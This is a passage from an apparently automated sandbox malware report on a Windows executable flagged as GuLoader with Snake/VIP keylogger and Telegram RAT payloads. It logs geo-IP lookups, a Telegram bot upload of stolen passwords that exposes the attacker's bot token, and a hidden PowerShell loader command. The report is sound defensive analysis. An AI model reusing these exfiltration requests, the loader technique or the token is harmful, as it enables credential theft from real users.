2024-12-19 07:19:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49857	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 07:19:48 UTC	878	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581557 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pZ7eD5BLI1I4c%2B2R02VEzlNr5qA0V0L55FV%2BTgPGu4Re6134nL7Wj7VDLcolC3x8NMDjLaUmJCn4elVz1mb%2F6fDY%2FutIzU135GZR8ES5yGYqnVnJLhg5ZFL4TsjP6paBizeQMTaV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a060d9d65e79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1877&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1498973&cwnd=222&unsent_bytes=0&cid=ea217b7165b73cb2&ts=456&x=0"
2024-12-19 07:19:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49869	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:51 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 07:19:51 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581560 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zUGb0NAlIpnx0X8HO7n6iPb9rrPTqNnnoDy56nN4NduJC24EkhxX8RRRsWlSGb0m5GvINcNhyQrzr3I8j%2F7Llq4kP%2FsngBwevwNH5qxUOR4lLX%2FYR8Ro5YTJbK6aKJ8NtYLc6aw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a0739e4dc413-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1477&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1914754&cwnd=173&unsent_bytes=0&cid=18a4a8c806172bdd&ts=450&x=0"
2024-12-19 07:19:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49876	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:54 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 07:19:54 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581563 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BRjgvM5%2FuHP8NTFU%2Fg04SEfuw%2FgEu0PxlS9MRNwD6KQDacahLtvn8XOe%2FxN7fTlkfTj%2BDlYAfPaW6QoGPEJGQEDUJMf10t6lYcSURhD3cuL7QyhslDJ51%2FsIljbXPvXuYUyO6DU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a085ad3d41ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660034&cwnd=198&unsent_bytes=0&cid=49041e2393dcda6d&ts=448&x=0"
2024-12-19 07:19:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49883	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:57 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 07:19:57 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581566 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzpyO5UH%2BNJgOZu5VD7SHZ6cFxT%2F5zw8A%2FZNL2uyccV%2FRUtLOSMWSP1zjf4Wo%2FGNZiovqlR0aEoXj8c9O9UhSb0%2BxJWwdLtO9hYBqQHNftqBqmNe%2BTxAxGu9eQo42FDSILFUh51b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a097ad48238e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1911&rtt_var=732&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1479979&cwnd=232&unsent_bytes=0&cid=ac402a622babfe24&ts=448&x=0"
2024-12-19 07:19:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49895	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:59 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 07:20:00 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:20:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581569 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utWZ9EO1dsIGx1SRNJ%2Bb2vD7FnWt5Je6XA2lHy%2B0ucCjKmi6sG6WoyHjcaeXNdBtqw60bIYdLJLeD94h903J1RCAKwDr4a3DFsoqN%2BKNyqFPzjOOfGnbo0cL5ja9hdQM2H7wXLNG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a0a9bea51819-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1477&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1899804&cwnd=215&unsent_bytes=0&cid=e21632e54d480ee2&ts=451&x=0"
2024-12-19 07:20:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49897	149.154.167.220	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:20:02 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-19 07:20:02 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 19 Dec 2024 07:20:02 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-19 07:20:02 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49917	149.154.167.220	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:20:12 UTC	344	OUT	POST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302 Host: api.telegram.org Content-Length: 581
2024-12-19 07:20:12 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 38 62 31 35 35 64 33 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 32 37 35 33 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 31 32 2f 32 30 32 34 20 2f 20 30 32 3a 31 39 3a 33 32 0d Data Ascii: --------------------------8dd2148b155d302Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:927537Date and Time: 19/12/2024 / 02:19:32
2024-12-19 07:20:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 19 Dec 2024 07:20:12 GMT Content-Type: application/json Content-Length: 538 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-19 07:20:13 UTC	538	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 37 32 30 33 34 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6d 6f 63 68 69 61 6b 61 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6d 6f 63 68 69 61 6b 61 6d 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 34 33 34 35 35 30 39 39 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6c 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 65 78 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 75 6c 69 65 74 73 65 78 79 39 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 39 32 38 Data Ascii: {"ok":true,"result":{"message_id":139,"from":{"id":7557203423,"is_bot":true,"first_name":"Momochiakam","username":"Momochiakambot"},"chat":{"id":5434550993,"first_name":"Juli","last_name":"Sexy","username":"Julietsexy911","type":"private"},"date":17345928

Target ID:	0
Start time:	02:18:03
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\66776676676.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\66776676676.exe"
Imagebase:	0x400000
File size:	571'408 bytes
MD5 hash:	A30468384472782C5B2FC6A439F641BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:18:04
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
Imagebase:	0xb10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:18:04
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:19:13
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x4d0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 66776676676.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzqbn0cs.1yg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otsqpuiq.sm3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyidkv0t.kqw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw4shled.mb0.ps1

C:\Users\user\AppData\Local\Temp\nstF2DE.tmp

C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Marsken.Ank

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

Windows Analysis Report
66776676676.exe